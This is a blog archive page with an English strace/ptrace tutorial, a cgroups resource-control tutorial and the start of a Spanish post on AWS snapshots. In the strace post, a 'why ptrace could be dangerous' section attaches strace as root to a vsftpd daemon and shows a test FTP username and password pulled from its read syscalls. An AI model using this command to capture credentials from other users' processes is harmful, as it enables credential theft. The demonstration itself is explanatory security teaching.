Ningún detalle es anecdótico...: bash

Mostrando entradas con la etiqueta bash. Mostrar todas las entradas

viernes, 19 de agosto de 2016

Strace 101 - stracing your stuff!

It's been a while since the last blog post now, like 4 months went by! I remeber once I thought I could write one post per week xD, that did not work at all hahaha. Anyway..., the last few days had the chance to spend some time working with strace and perf, so I decided to write something about it here as well.

Strace? What the heck is it?

Strace is a nice debugging/troubleshooting tool for Linux, that helps you identify the syscalls a particular process is using and the signals a proess receives (more details here). Syscalls are basically the interface to access to kernel services. Therefore knowing what particular syscalls a program is issuing and what the results of these calls are is really interesting when debugging some software problems.

But how is it possible that a User space process is able to see the syscalls another User space process issues? Well, there's a kernel feature called ptrace that makes that possible (yeah... ptrace is a system call xD). By definition ptrace is:

The ptrace() system call provides a means by which one process (the "tracer") may observe and control the execution of another process (the "tracee"), and examine and change the tracee's memory and registers. It is primarily used to implement breakpoint debugging and system call tracing.

There are basically 2 ways you can strace a process to see its syscalls, you can either launch the process using strace or you can attach strace to a running process (under certain conditions :D).

How does it work? Show me the money!

I strongly believe the best way to explain something is by showing working examples, so there we go... Lets see how many syscalls (and which ones) the classic "Hello World" issues. The C code is:

#include <stdio.h>
int main()
{
     printf("Hello World\n");
     return 0;
}

Compile and run:

juan@juan-VirtualBox:~$ gcc -o classic classic.c 
juan@juan-VirtualBox:~$ ./classic 
Hello World
juan@juan-VirtualBox:~$

now we run it using strace instead:

juan@juan-VirtualBox:~$ strace ./classic
execve("./classic", ["./classic"], [/* 60 vars */]) = 0
brk(0)  = 0x7f0000
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f0362d17000
access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
open("/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=85679, ...}) = 0
mmap(NULL, 85679, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7f0362d02000
close(3) = 0
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
open("/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0P \2\0\0\0\0\0"..., 832) = 832
fstat(3, {st_mode=S_IFREG|0755, st_size=1840928, ...}) = 0
mmap(NULL, 3949248, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f0362732000
mprotect(0x7f03628ec000, 2097152, PROT_NONE) = 0
mmap(0x7f0362aec000, 24576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1ba000) = 0x7f0362aec000
mmap(0x7f0362af2000, 17088, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7f0362af2000
close(3) = 0
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f0362d01000
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f0362cff000
arch_prctl(ARCH_SET_FS, 0x7f0362cff740) = 0
mprotect(0x7f0362aec000, 16384, PROT_READ) = 0
mprotect(0x600000, 4096, PROT_READ) = 0
mprotect(0x7f0362d19000, 4096, PROT_READ) = 0
munmap(0x7f0362d02000, 85679) = 0
fstat(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 2), ...}) = 0 
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f0362d16000
write(1, "Hello World\n", 12Hello World
) = 12
exit_group(0) = ?
+++ exited with 12 +++
juan@juan-VirtualBox:~$

The ouput provides one system call per line, and each line includes the syscall name, the parameters used to invoke it and the result returned (after the =). As we can see the simplest piece of code you can imagine will actually make use of many syscalls. I will only comment on a few of them (probably in a next post we can dive deep there :D):

execve (the first one), just before this call strace forked itself and the child process called ptrace syscall allowing strace parent to trace him. So after all that, the process runs execve changing its running code to our classic C program.
brk changes the location of the program break, which defines the end of the process's data segment. Increasing it has the effect of allocating memory to the process; or decreasing the break deallocates memory. In this case is called with 0 as increment, which makes the call return the current program break (0x7f0000).
we see a couple of mmap syscalls mapping memory regions as anonymous and also some mapping library libc.so.6. This is the Dynamic Linker doing its job and adding all the necessary libraries to the process memory space.
there are also a few open syscalls, opening files like /etc/ld.so.cache where it can find a list of the available system libraries.
just before finishing we see a write syscall, sending our classic "Hello World" to file descriptor 1, also known as STDOUT (standard output). Since both strace and classic are sending the standard output to the console we can see how the colided in lines 29 and 30.
the last call in place was exit_group, it's the equivalent to exit syscall but it terminates not only the calling thread but all the threads in the thread group (this particular example was single threaded).

This should provide a fair idea of what a particular piece of software does and which kernel services it's accessing to. However, sometimes we don't want to go into so much details, but instead we would like to see a summary. We can easily get that with -c flag:

juan@juan-VirtualBox:~$ strace -c ./classic 
Hello World
% time     seconds  usecs/call     calls    errors syscall
------ ----------- ----------- --------- --------- ----------------
  0.00    0.000000           0         1           read
  0.00    0.000000           0         1           write
  0.00    0.000000           0         2           open
  0.00    0.000000           0         2           close
  0.00    0.000000           0         3           fstat
  0.00    0.000000           0         8           mmap
  0.00    0.000000           0         4           mprotect
  0.00    0.000000           0         1           munmap
  0.00    0.000000           0         1           brk
  0.00    0.000000           0         3         3 access
  0.00    0.000000           0         1           execve
  0.00    0.000000           0         1           arch_prctl
------ ----------- ----------- --------- --------- ----------------
100.00    0.000000                    28         3 total
juan@juan-VirtualBox:~$

the output shows the list of syscalls issued by the process (and its threads if there were more than 1), the number of times each one was called, the number of times they failed, and the CPU time they consumed (kernel space time aka system time). With this output we can easily identify that 3 syscalls returned failed states, if we go back to the full strace output we'll see that lines 4, 6 and 11 returned ENOENT "No such file or directory".

I mentioned before that is also possible to strace an already running processes, so lets take a look at that. First we have to identify a process as target, in this case nc with PID 8739:

juan@juan-VirtualBox:~$ ps aux|grep -i nc
root       954  0.0  0.0  19196  2144 ?        Ss   01:33   0:04 /usr/sbin/irqbalance
juan      2055  0.0  0.2 355028  8396 ?        Ssl  01:33   0:00 /usr/lib/at-spi2-core/at-spi-bus-launcher --launch-immediately
juan      8739  0.0  0.0   9132   800 pts/0    S    11:52   0:00 nc -l 9999
juan      2585  0.0  0.0  24440  1964 ?        S    01:33   0:00 dbus-launch --autolaunch 0c0058daf07f369dd9b0d1605654eff1 --binary-syntax --close-stderr
juan      9477  0.0  0.0  15948  2304 pts/2    R+   14:03   0:00 grep --color=auto -i nc
juan@juan-VirtualBox:~$

now lets try to attach strace to it in order to inspect the syscalls:

juan@juan-VirtualBox:~$ strace -p 8739
strace: attach: ptrace(PTRACE_ATTACH, ...): Operation not permitted
Could not attach to process. If your uid matches the uid of the target
process, check the setting of /proc/sys/kernel/yama/ptrace_scope, or try
again as the root user. For more details, see /etc/sysctl.d/10-ptrace.conf
juan@juan-VirtualBox:~$

interesting :D. Turns out that by default Ubuntu doesn't allow ptrace_attach feature, why? we'll see an example later :P. Ptrace has different scopes (4 actually, 0 to 3, being 3 the most restrictive one):

A PTRACE scope of "0" is the more permissive mode. A scope of "1" limits PTRACE only to direct child processes (e.g. "gdb name-of-program" and "strace -f name-of-program" work, but gdb's "attach" and "strace -fp $PID" do not). The PTRACE scope is ignored when a user has CAP_SYS_PTRACE, so "sudo strace -fp $PID" will work as before.

if we take a look at the current ptrace_scope value will see we have scope 1:

juan@juan-VirtualBox:~$ cat /proc/sys/kernel/yama/ptrace_scope
1
juan@juan-VirtualBox:~$

At this point we have two options, we either try with sudo or we enable scope 1 system wide by changing /proc/sys/kernel/yama/ptrace_scope (this might be dangerous). Lets go with sudo now:

juan@juan-VirtualBox:~$ sudo strace -p 8739
Process 8739 attached
accept(3, {sa_family=AF_INET, sin_port=htons(34404), sin_addr=inet_addr("127.0.0.1")}, [16]) = 4
close(3) = 0
poll([{fd=4, events=POLLIN}, {fd=0, events=POLLIN}], 2, 4294967295) = 1 ([{fd=4, revents=POLLIN}])
read(4, "Hello World through NC\n", 2048) = 23
write(1, "Hello World through NC\n", 23) = 23
poll([{fd=4, events=POLLIN}, {fd=0, events=POLLIN}], 2, 4294967295) = 1 ([{fd=4, revents=POLLIN}])
read(4, "", 2048) = 0
shutdown(4, SHUT_RD) = 0
close(4) = 0
close(3) = -1 EBADF (Bad file descriptor)
close(3) = -1 EBADF (Bad file descriptor)
exit_group(0) = ?
+++ exited with 0 +++
juan@juan-VirtualBox:~$

It worked indeed! Lets do a brief review of the syscalls:

First an accept call. It extracts the first connection request on the queue of pending connections for the listening socket, 3, creates a new connected socket, and returns a new file descriptor referring to that socket , 4. The newly created socket is not in the listening state. The original socket 3 is unaffected by this call.
Then close call closes the listening socket 3.
The next call was poll, it waits for one of a set of file descriptors to become ready to perform I/O. In this case we can see it waits for fd 4 (the recent socket created due to the incoming connection) and fd 0 (the standard input).
Right after the poll we sea the read call, reading 23 bytes out of fd 4 using a 2048 bytes buffer.
After finishing reading, nc uses write to send the received bytes to fd 1, the standard output.
Then nc polls again for any extra data coming in, and this time the call returns empty as can be seen on the next read call returning 0. This poll is probably triggered by the connection being finished on the other side.
Shutdown call shuts down all or part of a full dupplex connection on a given socket, in this case the one pointed by fd 4.
Then we have 3 close calls, the first one closes the file descriptor used by the socket created by the accept call, while the next two calls try to close a fd that has already been closed on line 4 (fd 3), which is kind of weird and could be a bug.

Why ptrace could be dangerous?

Usually debugging tools are like two edged swords, right? Well, ptrace is no exception to that rule. Having access to the interface between user space and kernel space of a process can leak some important information, like credentials.

Lets see an extremely simple example. My virtual machine has vsftpd 3.0.2 running, so lets capture the credentials of a system user that logs into the FTP service. In this case will set a few extra flags on strace in order to make things easier:

-f will Trace child processes as they are created by currently traced processes as a result of the fork system call.
-eread -ewrite are two filters to tell strace to only record read and write syscalls.
-o sets an output file where the syscalls will be recorded.

So lets strace:

juan@juan-VirtualBox:~$ sudo strace -f -e trace=read,write -o output -p $(pidof vsftpd)
Process 10040 attached
Process 10280 attached
Process 10281 attached
Process 10282 attached
^CProcess 10040 detached
juan@juan-VirtualBox:~$

we can see vsftpd forked a couple of times while we connected to it using the ftp client. Now lets take a look at the content of output file:

juan@juan-VirtualBox:~$ cat output 
10280 read(3, "TZif2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\n\0\0\0\n\0\0\0\0"..., 4096) = 3533
10280 read(3, "TZif2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\v\0\0\0\v\0\0\0\0"..., 4096) = 2248
10280 read(4,  
10281 read(4, "# /etc/nsswitch.conf\n#\n# Example"..., 4096) = 507
10281 read(4, "", 4096)                 = 0
10281 read(4, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\260\23\0\0\0\0\0\0"..., 832) = 832
10281 read(4, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\240!\0\0\0\0\0\0"..., 832) = 832
10281 read(4, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\240\"\0\0\0\0\0\0"..., 832) = 832
10281 write(3, "Sat Aug 20 17:06:02 2016 [pid 10"..., 65) = 65
10281 write(0, "220 (vsFTPd 3.0.2)\r\n", 20) = 20
10281 read(0, "USER juan\r\n", 11)      = 11
10281 write(0, "331 Please specify the password."..., 34) = 34
10281 read(0, "PASS MyPassw0rd\r\n", 15)  = 15
10281 write(5, "\1", 1)                 = 1
10280 <... read resumed> "\1", 1)       = 1
10281 write(5, "\4\0\0\0", 4 
10280 read(4,  
10281 <... write resumed> )             = 4
10280 <... read resumed> "\4\0\0\0", 4) = 4
10281 write(5, "juan", 4 
10280 read(4,  
...
10282 write(0, "230 Login successful.\r\n", 23) = 23
10282 read(0, "SYST\r\n", 6)            = 6
10282 write(0, "215 UNIX Type: L8\r\n", 19) = 19
10282 read(0, "QUIT\r\n", 6)            = 6
10282 write(0, "221 Goodbye.\r\n", 14)  = 14
10282 +++ exited with 0 +++
10280 <... read resumed> 0x7ffe4994960f, 1) = ? ERESTARTSYS (To be restarted if SA_RESTART is set)
10280 --- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED, si_pid=10282, si_status=0, si_utime=0, si_stime=0} ---
10280 +++ killed by SIGSYS +++
10040 --- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_KILLED, si_pid=10280, si_status=SIGSYS, si_utime=0, si_stime=1} ---
juan@juan-VirtualBox:~$

As we anticipated, we can see both username and password on lines 12 and 14. Ok, yes, this is FTP and we could have captured the keys also with a simple network capture, but this is just an example :D of how strace (ptrace actually) can be used to leak sensitive information.

I hope this was interesting, at least it was for me xD. Here I list some interesting links I found on the way:

http://linux.die.net/man/1/strace
http://linux.die.net/man/2/ptrace
http://man7.org/linux/man-pages/man2/syscalls.2.html
https://www.kernel.org/doc/Documentation/security/Yama.txt

lunes, 4 de abril de 2016

cgroups 101 - keep your processes under control!

A few days ago reading a bit about System D and all the beauty of it, I came across Control Groups, aka cgroups. I had read about them before, however never had the chance to play around with them face to face.

Cgroups are a Kernel feature that allow sysadmins and human beings (:P) to group processes/tasks in order to assign system resources like CPU, memory, IO, etc in a more fine-grained way. Cgroups can be arranged in a hierarchical manner, and every process in the system will belong to exact one cgroup at any single point in time. In conjunction with Linux namespaces (next post :D), cgroups are a corner stone for things like Docker containers.

So how do cgroups provides access/accounting control to CPU, memory, etc?

There's another concept involved in cgroups, and it is subsystems. A subsystem is the resource scheduler/controller in charge of setting the limits for a particular resource. Some of the most common subsystems are:

cpuset: this subsystem provides the possibility to assign a group of tasks to a particular CPU and Memory Node, this is particularly interesting in NUMA systems.
memory: this subsystem as you have already realized, allows you to control the amount of memory a group of tasks can utilize.
freezer: this subsystem allows you to easily freeze a group of processes, and eventually unfreeze them later on so they can continue running.
blkio: yes, that's correct, this subsystem allows you to define IO limits to processes, only works if using CFQ IO scheduler.

You can get a full list of the supported subsystems on your system from /proc/cgroups file:

root@ubuntu-server:/etc# cat /proc/cgroups
#subsys_name    hierarchy       num_cgroups     enabled
cpuset 0       1       1
cpu     0       1       1
cpuacct 0       1       1
memory 0       1       1
devices 0       1       1
freezer 0       1       1
net_cls 0       1       1
blkio   0       1       1
perf_event      0       1       1
net_prio        0       1       1
hugetlb 0       1       1
root@ubuntu-server:/etc#

this is what it looks like on an Ubuntu 14.04.4 VM.

Ok, so far so good, but how can we access these so called cgroups and subsystems?

Fortunately the cgroups interface is accessible through its Virtual File System representation (there are a couple of fancy tools that are available on RHEL systems), we can see for example the default cgroups setup that comes with Ubuntu 14.04.4:

root@ubuntu-server:/etc# mount |grep cgroup
none on /sys/fs/cgroup type tmpfs (rw)
systemd on /sys/fs/cgroup/systemd type cgroup (rw,noexec,nosuid,nodev,none,name=systemd)
root@ubuntu-server:/etc#

Note: there's a systemd "device" mounted on /sys/fs/cgroup/systemd and the File System type is cgroup.None subsystems are included in this cgroup hierarchy.

but in order to start from scratch I'll build a new cgroup hierarchy ignoring the one that comes by default.

I created a new directory under the same tmpfs:

root@ubuntu-server:/etc# mkdir /sys/fs/cgroup/MyHierarchy
root@ubuntu-server:/etc# ls /sys/fs/cgroup/
MyHierarchy systemd
root@ubuntu-server:/etc#

then mounted a cgroup hierarchy on the new directory:

root@ubuntu-server:/etc# mount -t cgroup MyHierarchy -o none,name=MyHierarchy /sys/fs/cgroup/MyHierarchy/
root@ubuntu-server:/etc# mount |grep cgroup
none on /sys/fs/cgroup type tmpfs (rw)
systemd on /sys/fs/cgroup/systemd type cgroup (rw,noexec,nosuid,nodev,none,name=systemd)
MyHierarchy on /sys/fs/cgroup/MyHierarchy type cgroup (rw,none,name=MyHierarchy)
root@ubuntu-server:/etc#

Note: -o none will cause the mount not to include any subsystem on the hierarchy.

So, is that it? Well..., no xD, we've done nothing so far, but created a cgroup hierarchy, lets take a look at the files under it:

root@ubuntu-server:/etc# ls /sys/fs/cgroup/MyHierarchy/
cgroup.clone_children cgroup.procs cgroup.sane_behavior notify_on_release release_agent tasks
root@ubuntu-server:/etc#

these are the basic files for a cgroup, they describe for example what processes belong to it (tasks and cgroup.procs), what command should be executed after the last task leaves the cgroup (notify_on_release, release_agent), etc. The most interesting file is tasks file that keeps the list of the processes that belong to the cgroup, remember that by default all the processes will be listed there since this is a root cgroup:

root@ubuntu-server:/etc# head /sys/fs/cgroup/MyHierarchy/tasks
1
2
3
5
7
8
9
10
11
12
root@ubuntu-server:/etc# wc -l /sys/fs/cgroup/MyHierarchy/tasks
132 /sys/fs/cgroup/MyHierarchy/tasks
root@ubuntu-server:/etc#

Note: Processes IDs can show up more than once and not in order, however a particular process will belong to a single cgroup under the same hierarchy.

We can easily create a sub cgroup (child cgroup) by creating a folder under the root one:

root@ubuntu-server:/etc# mkdir /sys/fs/cgroup/MyHierarchy/SubCgroup1
root@ubuntu-server:/etc# ls /sys/fs/cgroup/MyHierarchy/SubCgroup1/
cgroup.clone_children cgroup.procs notify_on_release tasks
root@ubuntu-server:/etc#

this new cgroup has again similar files but no tasks are associated to it by default:

root@ubuntu-server:/etc# cat /sys/fs/cgroup/MyHierarchy/SubCgroup1/tasks
root@ubuntu-server:/etc#

We can easily move a task to this new cgroup by just writing the task PID into the tasks file:

root@ubuntu-server:/etc# echo $$
4826
root@ubuntu-server:/etc# ps aux|grep 4826
root 4826 0.0 0.7 21332 3952 pts/0 S Apr02 0:00 bash
root 17971 0.0 0.4 11748 2220 pts/0 S+ 04:30 0:00 grep --color=auto 4826
root@ubuntu-server:/etc# echo $$ > /sys/fs/cgroup/MyHierarchy/SubCgroup1/tasks
root@ubuntu-server:/etc# cat /sys/fs/cgroup/MyHierarchy/SubCgroup1/tasks
4826
17979
root@ubuntu-server:/etc#

in the previous example I moved the root bash process to SubCgroup1, and you can see the PID inside tasks file. But there's another PID there as well, why? That PID belongs to the cat command, basically any forked process will be assigned to the same cgroup its parent belongs to. We can also confirm PID 4826 doesn't belong to the root cgroup anymore:

root@ubuntu-server:/etc# grep 4826 /sys/fs/cgroup/MyHierarchy/tasks
root@ubuntu-server:/etc#

What if we want to know to which cgroup a particular process belongs to?

We can easily find that out from our lovely /proc:

root@ubuntu-server:/etc# cat /proc/4826/cgroup
3:name=MyHierarchy:/SubCgroup1
1:name=systemd:/user/1000.user/1.session
root@ubuntu-server:/etc#

Note: see how our shell belongs to two different cgroups, this is possible because they belong to different hierarchies.

Ok, but by themselves cgroups just segregate tasks in groups, however they become interestingly powerful when mixed with the subsystems.

Testing a few Subsystems:

I rolled back the hierarchy I mounted before using umount as with any other File System, so we are back to square one:

root@ubuntu-server:/etc# umount /sys/fs/cgroup/MyHierarchy/
root@ubuntu-server:/etc# mount |grep cgroup
none on /sys/fs/cgroup type tmpfs (rw)
systemd on /sys/fs/cgroup/systemd type cgroup (rw,noexec,nosuid,nodev,none,name=systemd)
root@ubuntu-server:/etc#

I mounted the hierarchy again, but this time enabling cpu, memory and blkio subsystems, like this:

root@ubuntu-server:/etc# mount -t cgroup MyHierarchy -o cpu,memory,blkio,name=MyHierarchy /sys/fs/cgroup/MyHierarchy
mount: MyHierarchy already mounted or /sys/fs/cgroup/MyHierarchy busy
root@ubuntu-server:/etc#

WTF??? according to the error the mount point is busy or still mounted... well it turns out that

When a cgroup filesystem is unmounted, if there are any child cgroups created

below the top-level cgroup, that hierarchy will remain active even though

unmounted; if there are no child cgroups then the hierarchy will be deactivated.

so, I have to either move process 4826 and its children to the root cgroup or killem' all!!! Of course killing them was the easy way out. With that done, boala:

root@ubuntu-server:/home/juan# mount -v -t cgroup MyHierarchy -o cpu,memory,blkio,name=MyHierarchy /sys/fs/cgroup/MyHierarchy
MyHierarchy on /sys/fs/cgroup/MyHierarchy type cgroup (rw,cpu,memory,blkio,name=MyHierarchy)
root@ubuntu-server:/home/juan#

now the hierarchy includes 3 subsystems, cpu, memory and blkio. Lets see what it looks like now:

root@ubuntu-server:/home/juan# ls /sys/fs/cgroup/MyHierarchy/
blkio.io_merged                   blkio.sectors_recursive           cpu.cfs_quota_us                    memory.move_charge_at_immigrate
blkio.io_merged_recursive         blkio.throttle.io_service_bytes   cpu.shares                          memory.numa_stat
blkio.io_queued                   blkio.throttle.io_serviced        cpu.stat                            memory.oom_control
blkio.io_queued_recursive         blkio.throttle.read_bps_device    memory.failcnt                      memory.pressure_level
blkio.io_service_bytes            blkio.throttle.read_iops_device   memory.force_empty                  memory.soft_limit_in_bytes
blkio.io_service_bytes_recursive blkio.throttle.write_bps_device   memory.kmem.failcnt                 memory.stat
blkio.io_serviced                 blkio.throttle.write_iops_device memory.kmem.limit_in_bytes          memory.swappiness
blkio.io_serviced_recursive       blkio.time                        memory.kmem.max_usage_in_bytes      memory.usage_in_bytes
blkio.io_service_time             blkio.time_recursive              memory.kmem.slabinfo                memory.use_hierarchy
blkio.io_service_time_recursive   blkio.weight                      memory.kmem.tcp.failcnt             notify_on_release
blkio.io_wait_time                blkio.weight_device               memory.kmem.tcp.limit_in_bytes      release_agent
blkio.io_wait_time_recursive      cgroup.clone_children             memory.kmem.tcp.max_usage_in_bytes SubCgroup1
blkio.leaf_weight                 cgroup.event_control              memory.kmem.tcp.usage_in_bytes      tasks
blkio.leaf_weight_device          cgroup.procs                      memory.kmem.usage_in_bytes
blkio.reset_stats                 cgroup.sane_behavior              memory.limit_in_bytes
blkio.sectors                     cpu.cfs_period_us                 memory.max_usage_in_bytes
root@ubuntu-server:/home/juan#

yeah... many files, right? We should find a few files per active subsystem:

root@ubuntu-server:/home/juan# ls /sys/fs/cgroup/MyHierarchy/|grep -c "cpu\."
4
root@ubuntu-server:/home/juan# ls /sys/fs/cgroup/MyHierarchy/|grep -c "memory\."
22
root@ubuntu-server:/home/juan# ls /sys/fs/cgroup/MyHierarchy/|grep -c "blkio\."
27
root@ubuntu-server:/home/juan#

These files are the ones we can tune and of course I'm not going to explain all of them (not that I know them to be honest xD). Something interesting is the fact that some particular parameters can't be applied to the root cgroup, for quite obvious reasons, remember that by default all the processes belong to the root cgroup in the hierarchy and you certainly don't want to throttle some critical system processes.

So for testing purposes I'll set up a second child cgroup called SubCgroup2 and I will set two different throttle limits to write operations on the root volume /dev/sda. First thing first, I need to identify the major and minor number of the device:

root@ubuntu-server:/home/juan# lsblk
NAME   MAJ:MIN RM   SIZE RO TYPE MOUNTPOINT
sda      8:0    0     5G 0 disk
├─sda1   8:1    0   4.5G 0 part /
├─sda2   8:2    0     1K 0 part
└─sda5   8:5    0   510M 0 part
sr0     11:0    1 1024M 0 rom
root@ubuntu-server:/home/juan#

Ok, 8 and 0 should do the trick here. Now we set the throttle using the file called blkio.throttle.write_bps_device, like this:

root@ubuntu-server:/home/juan# echo "8:0 10240000" > /sys/fs/cgroup/MyHierarchy/SubCgroup1/blkio.throttle.write_bps_device
root@ubuntu-server:/home/juan# echo "8:0 20480000" > /sys/fs/cgroup/MyHierarchy/SubCgroup2/blkio.throttle.write_bps_device
root@ubuntu-server:/home/juan#

see that I've throttled the processes under SubCgroup1 to 10240000 bytes per second and 20480000 bytes per second to processes that belong to SubCgroup2. In order to test this I've opened two new shells:

root@ubuntu-server:/home/juan# ps aux|grep bash
juan      1440 0.0 1.0 22456 5152 pts/0    Ss   22:28   0:00 -bash
root      2389 0.0 0.7 21244 3984 pts/0    S    22:35   0:00 bash
juan      6897 0.0 0.9 22456 4996 pts/2    Ss+ 23:49   0:00 -bash
juan      6961 0.1 1.0 22456 5076 pts/3    Ss+ 23:49   0:00 -bash
root      7276 0.0 0.4 11748 2132 pts/0    S+   23:50   0:00 grep --color=auto bash
root@ubuntu-server:/home/juan#

and pushed their PIDs to the cgroups:

root@ubuntu-server:/home/juan# echo 6897 > /sys/fs/cgroup/MyHierarchy/SubCgroup1/tasks
root@ubuntu-server:/home/juan# echo 6961 > /sys/fs/cgroup/MyHierarchy/SubCgroup2/tasks
root@ubuntu-server:/home/juan#

now lets see what happens when doing some intensive write to the drive:

Shell under SubCgroup1:

juan@ubuntu-server:~$ echo $$
6897
juan@ubuntu-server:~$ dd oflag=dsync if=/dev/zero of=test bs=1M count=512
512+0 records in
512+0 records out
536870912 bytes (537 MB) copied, 52.6549 s, 10.2 MB/s
juan@ubuntu-server:~$

Shell under SubCgroup2:

juan@ubuntu-server:~$ echo $$
6961
juan@ubuntu-server:~$ dd oflag=dsync if=/dev/zero of=test bs=1M count=512
512+0 records in
512+0 records out
536870912 bytes (537 MB) copied, 26.3397 s, 20.4 MB/s
juan@ubuntu-server:~$

Shell under the root cgroup (no throttling here :D):

juan@ubuntu-server:~$ dd oflag=dsync if=/dev/zero of=test bs=1M count=512
512+0 records in
512+0 records out
536870912 bytes (537 MB) copied, 3.98033 s, 135 MB/s
juan@ubuntu-server:~$

Cool, isn't it? the throttle worked fine, dd under shell 6897 was throttled at 10Mbytes/s while the one under shell 6961 was throttled at 20Mbytes/s. But what if two processes under the same cgroup try to write at the same time, how does the throttle work?

juan@ubuntu-server:~$ echo $$
6897
juan@ubuntu-server:~$ dd oflag=dsync if=/dev/zero of=test bs=1M count=512 & dd oflag=dsync if=/dev/zero of=test1 bs=1M count=512 &
[1] 8265
[2] 8266
juan@ubuntu-server:~$ 512+0 records in
512+0 records out
536870912 bytes (537 MB) copied, 105.142 s, 5.1 MB/s
512+0 records in
512+0 records out
536870912 bytes (537 MB) copied, 105.24 s, 5.1 MB/s

[1]- Done                    dd oflag=dsync if=/dev/zero of=test bs=1M count=512
[2]+ Done                    dd oflag=dsync if=/dev/zero of=test1 bs=1M count=512
juan@ubuntu-server:~$

the throughput limit is shared among the processes under the same cgroup, which makes perfect sense considering the limit is applied to the group as a whole. There are tons of different parameters to play with the blkio subsystem like weights, sectors, service time, etc. So be brave and have fun with them :P.

Last but not least, lets take a look at the cpu subsystem. This subsystem allows you to put some limits on the CPU utilization, here a list of the files you can use to tune it:

root@ubuntu-server:/home/juan# ls /sys/fs/cgroup/MyHierarchy/cpu.*
/sys/fs/cgroup/MyHierarchy/cpu.cfs_period_us
/sys/fs/cgroup/MyHierarchy/cpu.cfs_quota_us
/sys/fs/cgroup/MyHierarchy/cpu.shares
/sys/fs/cgroup/MyHierarchy/cpu.stat
root@ubuntu-server:/home/juan#

for the sake of me going to bed early I will only test cpu.shares feature. This share value defines a relative weight that the processes under a cgroup will have compared to processes on different cgroups, and this impacts directly on the amount of CPU time the processes can have. For example lets take the default value for the root cgroup:

root@ubuntu-server:/home/juan# cat /sys/fs/cgroup/MyHierarchy/cpu.shares
1024
root@ubuntu-server:/home/juan#

this means all the processes in this cgroup have that particular weight, so if we set the following weights on SubCgroup1 and SubCgroup2:

root@ubuntu-server:/home/juan# echo 512 > /sys/fs/cgroup/MyHierarchy/SubCgroup1/cpu.shares
root@ubuntu-server:/home/juan# echo 256 > /sys/fs/cgroup/MyHierarchy/SubCgroup2/cpu.shares
root@ubuntu-server:/home/juan#

what we mean is processes under SubCgroup1 will have half the CPU time than processes in the root cgroup and twice than processes under SubCgroup2. This is easy to see in the following ps output:

root@ubuntu-server:/home/juan# ps aux --sort=-pcpu|head
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
juan     23289 58.0 0.5   8264 2616 pts/2    R    04:02   0:11 dd if=/dev/zero of=/dev/null bs=1M count=512000000
juan     23288 32.4 0.5   8264 2616 pts/5    R    04:02   0:06 dd if=/dev/zero of=/dev/null bs=1M count=512000000
juan     23290 14.5 0.5   8264 2680 pts/0    R    04:02   0:02 dd if=/dev/zero of=/dev/null bs=1M count=512000000
root         1 0.0 0.5 33492 2772 ?        Ss   Apr03   0:00 /sbin/init
root         2 0.0 0.0      0     0 ?        S    Apr03   0:00 [kthreadd]
root         3 0.0 0.0      0     0 ?        S    Apr03   0:00 [ksoftirqd/0]
root         5 0.0 0.0      0     0 ?        S<   Apr03   0:00 [kworker/0:0H]
root         6 0.0 0.0      0     0 ?        S    Apr03   0:02 [kworker/u2:0]
root         7 0.0 0.0      0     0 ?        S    Apr03   0:01 [rcu_sched]
root@ubuntu-server:/home/juan# cat /proc/23288/cgroup
4:cpu,memory,blkio,name=MyHierarchy:/SubCgroup1
1:name=systemd:/user/1000.user/5.session
root@ubuntu-server:/home/juan# cat /proc/23289/cgroup
4:cpu,memory,blkio,name=MyHierarchy:/
1:name=systemd:/user/1000.user/7.session
root@ubuntu-server:/home/juan# cat /proc/23290/cgroup
4:cpu,memory,blkio,name=MyHierarchy:/SubCgroup2
1:name=systemd:/user/1000.user/6.session
root@ubuntu-server:/home/juan#

We can see from the CPU utilization column how the process under the root cgroup 23289 is using 58% of the CPU while the process under SubCgroup1 23288 is using 32.4% and the one in SubCgroup2 23290 14.5%.

Wrapping up:

Cgroups are awesome!, they provide a simple interface to a set of resource control capabilities that you can leverage on your Linux systems. There are many subsystems you can use, so for sure you will find the right one for your use case, no matter how weird it is xD. If you can choose... go with some RHEL like distribution, since they come with a set of scripts that can make your life way easier when it comes to handling cgroups, if you can't... be patiente and have fun with mount/umount hahaha.

sábado, 14 de noviembre de 2015

Snapshots automáticos y consistentes en AWS

Los snapshots pueden ser una forma muy tentadora de backups, dado que proveen una imagen de un volumen en un punto particular del tiempo. Pero como todo tipo de backup debemos asegurarnos que se hagan correctamente, de lo contrario el día que lo precisemos podríamos arrepentirnos de no haberlo hecho xD.

AWS permite crear snapshots de los volúmenes EBS que tengamos bajo nuestro control. Estos son algunos de los detalles al respecto:

